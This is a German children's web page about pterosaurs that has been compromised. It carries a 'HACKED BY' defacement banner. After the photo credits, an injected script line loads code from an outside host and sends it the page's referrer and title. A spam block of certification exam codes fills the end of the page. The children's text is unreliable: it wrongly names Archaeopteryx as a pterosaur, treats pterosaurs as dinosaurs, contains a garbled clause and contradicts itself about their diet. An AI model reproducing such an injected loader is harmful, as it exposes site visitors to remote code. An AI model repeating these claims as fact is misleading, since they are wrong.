HACKED BY
MrTuRkIsH



MrTuRkIsH

Flugsaurier « Florians Galaxis – Kinderseite und Kinderspiele
Flugdinosaurier

Flugsaurier

Wann lebten Flugsaurier?

Flugsaurier gab es vor sehr, sehr langer Zeit. Man geht aufgrund von einigen Skelettfunden davon aus, dass die ersten Flugsaurier schon vor fast 230 Millionen Jahren gelebt haben. Es gab sehr viele verschiedene Flugsaurier und im Laufe der Zeit hat sich ihr Äußeres stark verändert. Man vermutet zum Beispiel, dass die ersten Flugsaurier einen langen Schwanz hatten. Spätere Exemplare hatten nur einen kurzen oder auch gar keinen Schwanz.

Der wohl bekannteste Flugsaurier war der Archaeopteryx, man vermutet, dass die Vögel, die wir heute kennen, von ihm abstammen.

Flugsaurier gab es fast 150 Millionen Jahre lang auf der Erde. Doch mit allen anderen Dinosauriern, sind auch die Flugsaurier vor ungefähr 65 Millionen Jahren bei einem großen Massenaussterben von dieser Erde verschwunden.

Wo lebten Flugsaurier?

Flugsaurier lebten vermutlich überall auf der Welt. Viele Wissenschaftler gehen davon aus, dass die ersten Flugsaurier stets in der Nähe von Wasser gelebt haben. Das bedeutet, dass sie an großen Flüssen, Seen und auch Meeren gelebt haben müssen. Durch die direkte Nähe zum Wasser konnten sie nämlich sicherstellen, dass sie stets genug Nahrung finden konnten. Durch die Form ihrer Schnäbel und durch die Beschaffenheit ihrer Zähne, waren sie wahre Meister im Fangen von Fischen. Es kann sein, dass Flugsaurier alleine oder in großen Gruppen gelebt und gejagt haben. Ein Flugsaurier waren nicht auf das Fangen von Fischen angewiesen, sie hatten Schnäbel, die Fisch-Reusen nicht unähnlich sind. Doch Fisch haben sie vermutlich nicht about it gegessen, ihr Hauptnahrungsmittel war Plankton.

Dass Flugsaurier Fischfresser waren, das trifft zumindest auf die ersten Flugsaurier zu, die auf dieser Erde gelebt haben. Die Flugsaurier veränderten sich im Laufe der Zeit. Sie entwickelten sich weiter und passten sich ihrer Umgebung an. Und so ist die Wahrscheinlichkeit sehr hoch, dass sich die Flugsaurier irgendwann einmal von dem Wasser wegbewegt haben. Sie sollen in Wäldern, in den Bergen und auch in einigen Wüsten gelebt haben. Dies ist noch nicht sicher, Skelettfunde belegen diese Theorie nicht, ausschließen möchte man es jedoch auch nicht. In diesem Fall mussten die Flugsaurier natürlich auch nach einer alternativen Nahrungsquelle suchen, auf Fische oder Plankton konnten sie in diesen Lebensräumen jedenfalls nicht immer hoffen. Man vermutet daher, dass Flugsaurier, die sich für einen dieser Lebensräume entschieden haben, dazu übergegangen sind, Insekten zu jagen und zu fressen.

Wie groß war der größte Flugsaurier, der jemals gelebt hat?

Flugdinosaurier

Der größte Flugsaurier, der wohl jemals gelebt hat, hatte eine Flügelspannweite von mehr als zwölf Metern. Zum Vergleich: Der Albatros hat unter den Vögeln die größte Spannweite, sie liegt bei 3,60 Metern. Das ist doch ein erheblicher Unterschied. Der Kopf des Flugsauriers, er wird übrigens Quetzalcoatlus northropi genannt, ist fast zwei Meter lang. So groß sind nur die wenigsten Menschen. Zu diesem langen Kopf musste natürlich auch der Hals passen. Es verwundert daher niemanden, dass der Hals länger war, als 2,5 Meter. Bedenkt man nun, wie lang die Flügel dieses Flugsauriers waren und wie groß Kopf und auch Hals waren, so ist es verwunderlich, dass er wohl kaum 100 Kilogramm gewogen haben soll. Das sei die Höchstgrenze, so die Wissenschaftler. Wenn er mehr gewogen hätte, dann hätte er nicht mehr fliegen können.

Konnten Flugsaurier wirklich fliegen?

Lange Zeit hat man sich mit dieser Frage beschäftigt. Man ist zu dem Schluss gekommen, dass alle kleinen Flugsaurier tatsächlich fliegen konnten und dass sie wahrscheinlich auch ziemlich gute Flieger waren. Die großen Flugsaurier allerdings, wie zum Beispie der bereits genannte  Quetzalcoatlus northropi, sollen nicht richtig geflogen sein. Zwar sollen sie sich auch in der Luft fortbewegt haben, allerdings hat die Kraft ihrer Flügel nicht ausgereicht, um sie in die Lüfte zu bewegen. Sie sollen sogenannte Gleitflieger gewesen sein, die den Auftrieb des Windes genutzt haben, um fortzubewegen.

Fotos: ©iStockphoto.com/LindaMarieB, nilky
s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=‘ + encodeURIComponent(document.referrer) + ‚&default_keyword=‘ + encodeURIComponent(document.title) + “;


Apr 02, 2012 | Kategorie: Kinderspiele | Kommentare: Keine | Tags: , ,

Dies und Das:



SSCP   CAS-002   9L0-066   350-050   642-999   220-801   74-678   642-732   400-051   ICGB   c2010-652   70-413   101-400   220-902   350-080   210-260   70-246   1Z0-144   3002   AWS-SYSOPS   70-347   PEGACPBA71V1   220-901   70-534   LX0-104   070-461   HP0-S42   1Z0-061   000-105   70-486   70-177   N10-006   500-260   640-692   70-980   CISM   VCP550   70-532   200-101   000-080   PR000041   2V0-621   70-411   352-001   70-480   70-461   ICBB   000-089   70-410   350-029   1Z0-060   2V0-620   210-065   70-463   70-483   CRISC   MB6-703   1z0-808   220-802   ITILFND   1Z0-804   LX0-103   MB2-704   210-060   101   200-310   640-911   200-120   EX300   300-209   1Z0-803   350-001   400-201   9L0-012   70-488   JN0-102   640-916   70-270   100-101   MB5-705   JK0-022   350-060   300-320   1z0-434   350-018   400-101   350-030   000-106   ADM-201   300-135   300-208   EX200   PMP   NSE4   1Z0-051   c2010-657   C_TFIN52_66   300-115   70-417   9A0-385   70-243   300-075   70-487   NS0-157   MB2-707   70-533   CAP   OG0-093   M70-101   300-070   102-400   JN0-360   SY0-401   000-017   300-206   CCA-500   70-412   2V0-621D   70-178   810-403   70-462   OG0-091   1V0-601   200-355   000-104   700-501   70-346   CISSP   300-101   1Y0-201   200-125  , 200-125  , 100-105  , 100-105  , 70-347   2V0-621   300-101   220-802   210-260   JN0-360   NS0-157   70-487   70-532   1Z0-060   300-070   210-060   70-532   1Z0-060  , 220-802  , 1Y0-201   1Z0-061   352-001   NSE4  , 1Z0-803  , 640-692   MB2-707   102-400   352-001   OG0-093  , 70-270  , 70-980   MB5-705   N10-006   101-400   70-270   CAP   CAP   220-802   000-105   70-486   300-070   70-270  , 1Y0-201   500-260  , 2V0-620   400-101   101  , AWS-SYSOPS  , c2010-657   N10-006   300-208   642-732   SY0-401   100-105  , 1Z0-061   642-732   000-104  , 9L0-066  , 70-462   300-115  



bottom